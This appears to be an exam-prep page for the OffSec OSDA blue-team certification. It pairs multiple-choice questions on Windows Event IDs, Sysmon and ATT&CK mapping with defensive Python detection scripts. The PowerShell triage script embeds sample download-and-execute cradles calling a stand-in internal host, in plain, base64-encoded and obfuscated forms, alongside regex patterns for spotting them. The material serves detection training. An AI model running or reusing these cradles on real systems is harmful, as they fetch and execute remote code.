
100+ Free OSDA Practice Questions

Pass your OffSec Defense Analyst (OSDA) exam on the first try — instant access, no signup required.


Key Facts: OSDA Exam

Exam Duration: 24 hrs (OffSec: 23h45m practical)
Passing Score: 75/100 (OffSec)
Phases: 10 (OffSec: 10 pts each)
Learn One Price: $2,499 (OffSec, annual subscription)
Validity: 3 yrs (OffSec, since 2023)
Difficulty: 200-level (OffSec: foundational SOC)

The OSDA exam is NOT multiple choice — it is a 23h45m hands-on detection lab with 10 phases (10 points each, 75 to pass) using pre-recorded attack logs in an Elastic SIEM, plus 24 hours for the report. You detect, document, and map attacker actions to MITRE ATT&CK. Our 100 practice questions on this site build the underlying knowledge (Event IDs, Sysmon, ATT&CK mapping, hunting queries) — they do NOT replicate the exam. Certification is valid 3 years.

Sample OSDA Practice Questions

Try these sample questions to test your OSDA exam readiness. Each question includes a detailed explanation. Start the interactive quiz above for the full 100+ question experience with AI tutoring.

1. A Windows security log entry with Event ID 4624 indicates which event?
A. A failed logon
B. A successful logon
C. A new account creation
D. A log cleared
Explanation: Event ID 4624 records a successful logon. Its LogonType field tells you how the session was created (2 Interactive, 3 Network, 5 Service, 10 RemoteInteractive, and so on) and is usually the first pivot in an investigation. 4625 is a failed logon, 4720 is account creation, 1102 is the Security log being cleared. Instant recall of these IDs is foundational for OSDA-style SOC work.
2. Which Sysmon event ID corresponds to 'Process Create' and is central to execution-tactic detection?
A. Event ID 1
B. Event ID 3
C. Event ID 11
D. Event ID 22
Explanation: Sysmon Event ID 1 (ProcessCreate) logs every new process along with its command line, parent process, user and file hashes. Event 3 is a network connection, 11 is file creation, 22 is a DNS query. Process creation events are the spine of almost every detection rule.
3. Which MITRE ATT&CK tactic is associated with technique T1059 Command and Scripting Interpreter (e.g., PowerShell)?
A. Initial Access
B. Execution
C. Defense Evasion
D. Impact
Explanation: T1059 maps to the Execution tactic. Attackers use cmd.exe, PowerShell, bash, or other interpreters to run commands. Recognizing tactic/technique mapping is a major OSDA grading criterion: every detection must be mapped.
4. Which Windows Event ID shows that a Windows event log was cleared, a common Defense Evasion indicator?
A. Event ID 1102
B. Event ID 4624
C. Event ID 4688
D. Event ID 5140
Explanation: Event ID 1102 is written to the Security log when the Security log is cleared; Event ID 104 is written to the System log when the System or Application log is cleared. Both are strong Defense Evasion signals and map to T1070.001 Clear Windows Event Logs. 4624 is a successful logon, 4688 is process creation, 5140 is network share access.
5. Which PowerShell logging event ID captures the actual script block content executed (including deobfuscated content)?
A. 4103
B. 4104
C. 4697
D. 5140
Explanation: Event ID 4104 (Microsoft-Windows-PowerShell/Operational) records the text of each script block as it is compiled, so layers that an attacker unwraps at runtime (for example a base64 -EncodedCommand payload that then builds more code) are logged in the clear as they execute. 4103 captures module/pipeline execution details. Full coverage requires the "Turn on PowerShell Script Block Logging" policy (ideally with Transcription as well); PowerShell 5 and later also writes 4104 events at Warning level for blocks it considers suspicious even when the policy is off, but that safety net is not a substitute for enabling it.
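The explanation above is the kind of triage you do by hand in the exam: pull 4104 ScriptBlockText, decode anything passed through -EncodedCommand, and look for the usual obfuscation and download-cradle markers. The script below is an added example for this page, not code from OffSec or the SOC-200 course. The three 4104 events are constructed inline in a simplified Winlogbeat-style shape (the event_data field names ScriptBlockText, ScriptBlockId and Path are the real ones, the values are made up), and the indicator names and scoring threshold are the author's own choices, not a standard.

```python
"""Triage PowerShell 4104 ScriptBlockText for encoded commands and obfuscation.

Added example, not code from OffSec or SOC-200. Events below are constructed;
event_data keys match the real 4104 fields, values are invented.
"""
import base64
import re

# -EncodedCommand, -enc, -ec or -e followed by a base64 blob (UTF-16LE once decoded).
ENC_RE = re.compile(r"(?i)(?:-e(?:nc(?:odedcommand)?)?|-ec)\s+([A-Za-z0-9+/=]{16,})")

# Indicator names are ours; each regex runs over the raw block plus its decoded payload.
INDICATORS = {
    "invoke-expression": re.compile(r"(?i)\biex\b|invoke-expression"),
    "download-cradle": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient"),
    "base64-decode": re.compile(r"(?i)frombase64string"),
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "char-code-build": re.compile(r"(?i)\[char\]\s*\d+"),
}

# Constructed payload and its -enc form, exactly as PowerShell expects it.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

def ps4104(block_id, path, text):
    return {"winlog": {"channel": "Microsoft-Windows-PowerShell/Operational", "event_id": 4104,
                       "event_data": {"ScriptBlockId": block_id, "Path": path, "ScriptBlockText": text}}}

# Constructed sample: one admin script, one encoded cradle, one backtick/char-code cradle.
EVENTS = [
    ps4104("a1", "C:\\Scripts\\cleanup.ps1", "Get-ChildItem C:\\Temp | Remove-Item -Force"),
    ps4104("b2", "", "powershell.exe -nop -w hidden -enc " + ENC),
    ps4104("c3", "", "& ([string]::Join('', ([char]73,[char]69,[char]88))) "
                     "(N`ew-Ob`ject Net.WebClient).Down`loadString('http://10.0.0.5/b.ps1')"),
]

def decode_encoded_command(text):
    """Return the UTF-16LE payload of a -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_script_block(event):
    """Score one 4104 event: one point per indicator, plus one if -enc was present."""
    data = event["winlog"]["event_data"]
    text = data.get("ScriptBlockText", "")
    decoded = decode_encoded_command(text)
    hits = ["encoded-command"] if decoded is not None else []
    corpus = text + "\n" + (decoded or "")      # scan both so -enc cannot hide a cradle
    hits += [name for name, rx in INDICATORS.items() if rx.search(corpus)]
    if corpus.count("`") >= 3:                  # backtick insertion inside keywords
        hits.append("backtick-padding")
    return {"ScriptBlockId": data.get("ScriptBlockId"), "Path": data.get("Path", ""),
            "score": len(hits), "indicators": hits, "decoded": decoded}

def triage(events, threshold=2):
    """Scored 4104 blocks at or above threshold, highest score first."""
    scored = [score_script_block(e) for e in events if e["winlog"]["event_id"] == 4104]
    return sorted((s for s in scored if s["score"] >= threshold), key=lambda s: -s["score"])

if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

The decoded payload is scanned together with the raw block on purpose: an -enc blob scores nothing by itself, and a rule that only looks at ScriptBlockText as written would miss the IEX/DownloadString cradle inside it.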
6. Which Windows Event ID indicates a new service was installed, often used for T1543.003 Persistence: Windows Service?
A. 7045
B. 4688
C. 4624
D. 5140
Explanation: Event ID 7045 in the System log records a new service installation including the service name, image path, start type and account. The Security-log equivalent is 4697 (A service was installed in the system), which is only written when the Audit Security System Extension subcategory is enabled. Either one is a bread-and-butter persistence detection; pay attention to services whose binary sits in a user-writable directory or is cmd.exe/PowerShell. The other options are unrelated IDs.
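Questions 3, 4 and 6 all come down to the same grading requirement: each detected action must be tied to an ATT&CK tactic and technique. The script below is an added example for this page, not code from OffSec or the SOC-200 course. It runs a handful of predicate rules over a constructed mix of Security, System and Sysmon events (channel names, event IDs and event_data field names are the real ones; the hosts, paths and timestamps are invented) and emits a time-ordered, ATT&CK-tagged finding list of the kind an exam phase write-up needs. The rule set and the "user-writable path" heuristic are the author's own, not a standard.

```python
"""Map Windows/Sysmon events to ATT&CK techniques with small predicate rules.

Added example, not code from OffSec or SOC-200. Events below are constructed;
channel names, IDs and event_data keys are real, values are invented.
"""
import re

SYSMON = "Microsoft-Windows-Sysmon/Operational"
# Heuristic: service binaries under these paths are worth a finding; System32 is not (by itself).
USER_WRITABLE = re.compile(r"(?i)\\(users|programdata|temp|windows\\temp)\\")

def service_from_odd_path(d):
    """7045 uses ImagePath, 4697 uses ServiceFileName; flag odd locations or interpreters."""
    path = d.get("ImagePath") or d.get("ServiceFileName", "")
    return bool(USER_WRITABLE.search(path)) or bool(re.search(r"(?i)cmd\.exe|powershell", path))

def wmic_remote_exec(d):
    proc = d.get("NewProcessName", "").lower()
    return proc.endswith("wmic.exe") and "/node:" in d.get("CommandLine", "").lower()

def run_key_write(d):
    return "\\currentversion\\run" in d.get("TargetObject", "").lower()

# (channel, event_id, predicate over event_data, technique, tactic)
RULES = [
    ("Security", 1102, lambda d: True, "T1070.001 Clear Windows Event Logs", "Defense Evasion"),
    ("System", 104, lambda d: True, "T1070.001 Clear Windows Event Logs", "Defense Evasion"),
    ("System", 7045, service_from_odd_path, "T1543.003 Windows Service", "Persistence"),
    ("Security", 4697, service_from_odd_path, "T1543.003 Windows Service", "Persistence"),
    ("Security", 4688, wmic_remote_exec, "T1047 Windows Management Instrumentation", "Execution"),
    (SYSMON, 13, run_key_write, "T1547.001 Registry Run Keys / Startup Folder", "Persistence"),
]

def ev(ts, channel, event_id, **data):
    return {"@timestamp": ts, "winlog": {"channel": channel, "event_id": event_id, "event_data": data}}

# Constructed sample stream: one benign service, then a remote WMI exec, a service dropped in
# C:\Users\Public, a Run key pointing at it, a cleared Security log, and an unrelated registry write.
EVENTS = [
    ev("2024-05-01T09:00:00Z", "System", 7045, ServiceName="LegitSvc", StartType="auto start",
       ImagePath="C:\\Windows\\System32\\svchost.exe -k netsvcs", AccountName="LocalSystem"),
    ev("2024-05-01T09:05:12Z", "Security", 4688, SubjectUserName="Administrator",
       NewProcessName="C:\\Windows\\System32\\wbem\\WMIC.exe",
       CommandLine='wmic /node:"FS01" process call create "cmd.exe /c whoami"'),
    ev("2024-05-01T09:07:40Z", "System", 7045, ServiceName="WinUpdSvc", StartType="auto start",
       ImagePath="C:\\Users\\Public\\updater.exe", AccountName="LocalSystem"),
    ev("2024-05-01T09:07:42Z", SYSMON, 13, Image="C:\\Windows\\regedit.exe",
       TargetObject="HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
       Details="C:\\Users\\Public\\updater.exe"),
    ev("2024-05-01T09:30:05Z", "Security", 1102, SubjectUserName="Administrator", SubjectDomainName="CORP"),
    ev("2024-05-01T09:31:00Z", SYSMON, 13, Image="C:\\Windows\\System32\\svchost.exe",
       TargetObject="HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Foo", Details="1"),
]

def summarize(d):
    """Pick the one field a report reader most wants to see as evidence."""
    for k in ("CommandLine", "ImagePath", "ServiceFileName", "TargetObject", "SubjectUserName"):
        if d.get(k):
            return f"{k}={d[k]}"
    return ""

def evaluate(events):
    """Return ATT&CK-tagged findings in timestamp order."""
    findings = []
    for e in sorted(events, key=lambda e: e["@timestamp"]):
        w = e["winlog"]
        for channel, eid, pred, technique, tactic in RULES:
            if w["channel"] == channel and w["event_id"] == eid and pred(w["event_data"]):
                findings.append({"time": e["@timestamp"], "event_id": eid, "tactic": tactic,
                                 "technique": technique, "evidence": summarize(w["event_data"])})
    return findings

if __name__ == "__main__":
    for f in evaluate(EVENTS):
        print(f"{f['time']}  {f['tactic']:16} {f['technique']:45} {f['evidence']}")
```

Note that the 7045 for svchost.exe in System32 produces nothing: the rule is deliberately narrower than "any new service", because a phase write-up that lists every Windows Update service install as persistence loses credibility with the grader just as it would with a SOC lead.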
7. Which Kibana/Elastic query language does the current OSDA-era SOC-200 primarily use?
A. SQL
B. KQL (Kibana Query Language) and Lucene syntax
C. PromQL
D. Splunk SPL
Explanation: OSDA's lab SIEM is the Elastic Stack with Kibana. KQL is Kibana's simplified default query language; Lucene syntax is the alternative for more complex expressions. Splunk uses SPL, PromQL is for Prometheus, SQL is for relational databases.
8. Which Sysmon event ID logs a network connection from a process?
A. 1
B. 3
C. 7
D. 22
Explanation: Sysmon Event 3 (NetworkConnect) logs outbound network connections with the process image, source/destination IP and port, and protocol. It is crucial for C2 detection. Event 1 is process creation, 7 is image load, 22 is a DNS query.
9. Which ATT&CK technique is reflected by PowerShell using `Get-WmiObject Win32_Process` to enumerate remote hosts?
A. T1047 Windows Management Instrumentation
B. T1021.001 RDP
C. T1090 Proxy
D. T1020 Automated Exfiltration
Explanation: WMI queries such as Win32_Process, local or remote, map to T1047 Windows Management Instrumentation, which sits under the Execution tactic. When the query's purpose is to list running processes you would additionally map T1057 Process Discovery (Discovery tactic); the one action can legitimately carry both. T1021.001 is RDP lateral movement; T1090 is Proxy; T1020 is automated exfiltration.
10. Which Windows Event ID captures special-privilege (admin) tokens assigned to a session at logon, often a precursor to Privilege Escalation detection?
A. 4672
B. 4624
C. 4625
D. 4688
Explanation: Event 4672 records 'Special privileges assigned to new logon' for accounts granted sensitive privileges such as SeDebugPrivilege or SeTcbPrivilege. It is frequently paired with 4624 to filter for high-privilege sessions; the join key is the logon ID (4672 SubjectLogonId equals 4624 TargetLogonId), not the user name, since the same account can hold several sessions at once. 4625 is a failed logon, 4688 is process creation.
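Questions 1 and 10 together describe one of the most common exam pivots: decode the 4624 LogonType, then join 4672 on the logon ID to find the privileged sessions that arrived from another host. The script below is an added example for this page, not code from OffSec or the SOC-200 course. The events are constructed inline in a simplified Winlogbeat-style shape; the event_data field names (LogonType, TargetUserName, TargetLogonId, IpAddress for 4624; SubjectLogonId, PrivilegeList for 4672) are the real Windows fields, while the accounts, hosts and timestamps are invented. The privilege list used as "sensitive" is the author's selection.

```python
"""Correlate Security 4624 (successful logon) with 4672 (special privileges) by logon id.

Added example, not code from OffSec or SOC-200. Events below are constructed;
event_data keys match the real fields, values are invented.
"""
from collections import defaultdict

LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service", 7: "Unlock",
               8: "NetworkCleartext", 9: "NewCredentials", 10: "RemoteInteractive",
               11: "CachedInteractive"}
REMOTE_TYPES = {3, 10}   # sessions created from another host
HIGH_PRIVS = {"SeDebugPrivilege", "SeTcbPrivilege", "SeLoadDriverPrivilege",
              "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege"}

def sec(ts, event_id, **data):
    """One constructed Security-channel event."""
    return {"@timestamp": ts, "winlog": {"channel": "Security", "event_id": event_id,
                                         "event_data": data}}

# Constructed sample: a console logon, a backup service account over the network,
# an RDP logon holding debug/tcb rights, and an ordinary network logon.
EVENTS = [
    sec("2024-05-01T08:58:10Z", 4624, LogonType="2", TargetUserName="alice", TargetDomainName="CORP",
        TargetLogonId="0x3e7a1", IpAddress="-", WorkstationName="WS01"),
    sec("2024-05-01T09:02:33Z", 4624, LogonType="3", TargetUserName="svc_backup", TargetDomainName="CORP",
        TargetLogonId="0x4f120", IpAddress="10.0.0.50", WorkstationName="FS01"),
    sec("2024-05-01T09:02:33Z", 4672, SubjectUserName="svc_backup", SubjectDomainName="CORP",
        SubjectLogonId="0x4f120",
        PrivilegeList="SeSecurityPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege"),
    sec("2024-05-01T09:15:02Z", 4624, LogonType="10", TargetUserName="Administrator", TargetDomainName="CORP",
        TargetLogonId="0x51a0c", IpAddress="10.0.0.77", WorkstationName="WS07"),
    sec("2024-05-01T09:15:02Z", 4672, SubjectUserName="Administrator", SubjectDomainName="CORP",
        SubjectLogonId="0x51a0c",
        PrivilegeList="SeDebugPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeLoadDriverPrivilege"),
    sec("2024-05-01T09:20:45Z", 4624, LogonType="3", TargetUserName="bob", TargetDomainName="CORP",
        TargetLogonId="0x5c3d9", IpAddress="10.0.0.60", WorkstationName="WS03"),
]

def index_privileges(events):
    """logon id -> set of privilege names, collected from every 4672 in the stream."""
    privs = defaultdict(set)
    for e in events:
        w = e["winlog"]
        if w["channel"] == "Security" and w["event_id"] == 4672:
            d = w["event_data"]
            privs[d["SubjectLogonId"]].update(d["PrivilegeList"].split())  # newline/tab separated
    return privs

def privileged_remote_logons(events):
    """4624 sessions of a remote logon type whose logon id also received sensitive privileges."""
    privs = index_privileges(events)
    findings = []
    for e in events:
        w = e["winlog"]
        if w["channel"] != "Security" or w["event_id"] != 4624:
            continue
        d = w["event_data"]
        ltype = int(d["LogonType"])
        if ltype not in REMOTE_TYPES:
            continue
        high = sorted(privs.get(d["TargetLogonId"], set()) & HIGH_PRIVS)
        if not high:
            continue
        # Only type 10 pins the sub-technique; a type 3 session could be SMB, WMI or WinRM.
        technique = "T1021.001 Remote Desktop Protocol" if ltype == 10 else "T1021 Remote Services"
        findings.append({"time": e["@timestamp"],
                         "user": f'{d["TargetDomainName"]}\\{d["TargetUserName"]}',
                         "logon_type": f"{ltype} ({LOGON_TYPES.get(ltype, 'Unknown')})",
                         "source": d["IpAddress"], "privileges": high, "technique": technique})
    return findings

if __name__ == "__main__":
    for f in privileged_remote_logons(EVENTS):
        print(f)
```

The equivalent Kibana filter is two queries rather than one: `event.code:4624 and winlog.event_data.LogonType:(3 or 10)` to list candidate sessions, then `event.code:4672 and winlog.event_data.SubjectLogonId:<id>` for each one you care about; the script simply does that join for you.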

About the OSDA Exam

The OffSec Defense Analyst (OSDA) is OffSec's blue-team certification tied to the SOC-200 course. It validates the ability to detect, triage, and investigate attacker activity across the full MITRE ATT&CK kill chain using a SIEM (Elastic/Kibana), Windows event logs, Sysmon, PowerShell logging, and forensic artifacts.

Questions: 10 scored phases (no multiple-choice questions; each phase contains several attacker actions to detect and document)
Time Limit: 23 hours 45 minutes + 24 hours reporting
Passing Score: 75/100 points (10 phases x 10 pts)
Exam Fee: $2,499 (Learn One annual subscription, OffSec (Offensive Security))

OSDA Exam Content Outline

Core: SIEM & Log Analysis (Elastic/Kibana)
KQL/Lucene queries, Sigma rules, dashboard creation, log source integration, Windows Event Log (4624/4625/4688/4672/7045/1102), Sysmon events 1/3/7/11/13/22

Core: MITRE ATT&CK Framework
Mapping attacker actions to tactics/techniques: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, C2, Exfiltration, Impact

Core: Detection Engineering
PowerShell logging (ScriptBlock 4104, Transcription), ETW, process injection detection, lateral movement patterns (WMI/PsExec/WinRM/RDP), persistence (Run keys, services, scheduled tasks), C2 beaconing analysis

Core: Forensic Triage & Incident Response
Artifact analysis (Prefetch, Amcache, Shimcache, UserAssist, Jump Lists), memory analysis (Volatility), network forensics (PCAP in Wireshark), IR playbooks, KAPE/Velociraptor

How to Pass the OSDA Exam

What You Need to Know

  • Passing score: 75/100 points (10 phases x 10 pts)
  • Exam length: 10 phases, each containing several attacker actions to detect and document
  • Time limit: 23 hours 45 minutes + 24 hours reporting
  • Exam fee: $2,499 (Learn One annual subscription)

Keys to Passing

  • Complete 500+ practice questions
  • Score 80%+ consistently before scheduling
  • All 10 phases carry the same 10-point weight, so budget the 23h45m evenly instead of polishing early phases
  • Use our AI tutor for tough concepts

OSDA Study Tips from Top Performers

1. Memorize core Windows Event IDs: 4624/4625/4688/4672/7045/1102 should be instant recall
2. Know Sysmon event IDs 1, 3, 7, 11, 13, 22 cold; these are the bread and butter of detection
3. Practice KQL/Lucene in a free Elastic instance: aggregations, regex matches, pivot queries
4. Build a MITRE ATT&CK mental map: Discovery techniques look different from Lateral Movement
5. Learn common C2 beaconing indicators: fixed interval plus jitter, unusual TLS JA3 fingerprints, DNS TXT abuse
6. Read real incident reports (Mandiant, CrowdStrike, Red Canary) to see how professionals structure findings
7. Treat the questions here as knowledge checks; the real exam is 24 hours of hands-on SIEM investigation
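Tip 5 and question 8 above both point at the same analysis: take Sysmon Event 3 connections, group them by process and destination, and measure how regular the inter-arrival times are, since a beacon with jitter still has a far tighter spread than a human browsing. The script below is an added example for this page, not code from OffSec or the SOC-200 course. It constructs its own Sysmon 3 sample (a fake implant beaconing every 60 s with +/-10 % jitter next to a browser with bursty traffic; the UtcTime/Image/DestinationIp/DestinationPort fields are the real Sysmon names, everything else is invented) and scores each flow by coefficient of variation. The thresholds are the author's starting values, not a standard, and real traffic needs a longer window than twenty connections.

```python
"""Flag periodic outbound connections (beaconing) in Sysmon Event 3 data.

Added example, not code from OffSec or SOC-200. The sample stream is
constructed below with a fixed random seed; field names are real Sysmon 3
fields, values are invented.
"""
import random
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

SYSMON = "Microsoft-Windows-Sysmon/Operational"
TIME_FMT = "%Y-%m-%d %H:%M:%S.%f"   # Sysmon UtcTime looks like 2024-05-01 09:00:00.123

def net3(utc, image, dst, port):
    """One constructed Sysmon NetworkConnect event."""
    return {"winlog": {"channel": SYSMON, "event_id": 3, "event_data": {
        "UtcTime": utc.strftime(TIME_FMT)[:-3], "Image": image, "Protocol": "tcp",
        "DestinationIp": dst, "DestinationPort": str(port)}}}

def build_sample():
    """20 jittered beacon connections plus 20 bursty browser connections, same start time."""
    rng = random.Random(7)                      # fixed seed: the sample is reproducible
    t0 = datetime(2024, 5, 1, 9, 0, 0)
    events = []
    t = t0
    for _ in range(20):                         # implant: 60 s period, +/-10 % jitter
        events.append(net3(t, "C:\\Users\\Public\\updater.exe", "203.0.113.10", 443))
        t += timedelta(seconds=60 * (1 + rng.uniform(-0.1, 0.1)))
    t = t0
    for gap in (1, 2, 40, 3, 1, 300, 5, 2, 900, 4, 1, 1, 120, 2, 60, 7, 3, 1, 450, 9):
        t += timedelta(seconds=gap)             # browser: clicks, then long idle gaps
        events.append(net3(t, "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "198.51.100.7", 443))
    return events

def beacon_candidates(events, min_conns=8, max_cv=0.25):
    """Group Sysmon 3 by (Image, dst ip, dst port); low stdev/mean of the gaps means periodic."""
    groups = defaultdict(list)
    for e in events:
        w = e["winlog"]
        if w["channel"] != SYSMON or w["event_id"] != 3:
            continue
        d = w["event_data"]
        groups[(d["Image"], d["DestinationIp"], d["DestinationPort"])].append(
            datetime.strptime(d["UtcTime"], TIME_FMT))
    results = []
    for (image, ip, port), times in groups.items():
        if len(times) < min_conns:              # too few samples to call anything periodic
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        results.append({"image": image, "dst": f"{ip}:{port}", "count": len(times),
                        "mean_interval_s": round(avg, 1), "cv": round(cv, 3),
                        "beacon": cv <= max_cv})
    return sorted(results, key=lambda r: r["cv"])

if __name__ == "__main__":
    for r in beacon_candidates(build_sample()):
        print(r)
```

In Kibana the same first cut is a date histogram of Sysmon 3 events split by `process.executable` and `destination.ip`; the script's coefficient of variation is what your eye is doing when the bars line up evenly.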

Frequently Asked Questions

Is the OSDA exam multiple choice?

No. The OSDA exam is a 23h45m hands-on SOC-analyst simulation. You work through pre-recorded logs in an Elastic SIEM (since the Sep 10, 2024 format update) across 10 phases. Each phase contains multiple attacker actions you must detect, document, and map to MITRE ATT&CK. Then you have 24 hours to submit a professional incident report. Our 100 practice questions build the knowledge (Event IDs, Sysmon, KQL, ATT&CK) — they do not replicate the exam.

What is the OSDA passing score?

You need 75 out of 100 points. The exam is split into 10 phases worth 10 points each. Each phase contains a number of attacker actions (enumeration, brute force, lateral movement, privilege escalation, persistence, etc.) that must be detected and documented to earn points.

Which SIEM does the OSDA use?

The current SOC-200 course and OSDA exam use an Elastic Stack (Elasticsearch + Kibana) deployment with Windows Event Log and Sysmon data. While the concepts of SIEM analysis apply broadly (Splunk, Sentinel, etc.), hands-on lab work is done in Elastic/Kibana, so KQL/Lucene query syntax matters.

What Windows Event IDs do I need to know for OSDA?

Core IDs: 4624 (successful logon), 4625 (failed logon), 4672 (special privileges assigned), 4688 (process creation), 4697/7045 (service installed, Security/System log), 1102 (Security log cleared), 5140 (network share accessed), 4103/4104 (PowerShell Module/ScriptBlock logging). Sysmon: 1 (process create), 3 (network connect), 7 (image load), 11 (file create), 13 (registry value set), 22 (DNS query). Our practice questions drill all of these.

Is OSDA entry-level?

OSDA is SOC-200-level — foundational in the OffSec SOC track. It assumes general IT knowledge and basic security concepts but does not require prior certifications. Community estimates put first-attempt pass rates in the 60-70% range for candidates who complete the SOC-200 labs.

How should I use these practice questions?

Treat them as knowledge validators for SOC-200 modules. Weak answers on Event ID meanings, Sysmon schema, KQL syntax, or ATT&CK technique mapping point you back to the course labs and the ATT&CK Navigator. The real exam rewards speed of pivoting through logs — knowledge is a prerequisite for that speed.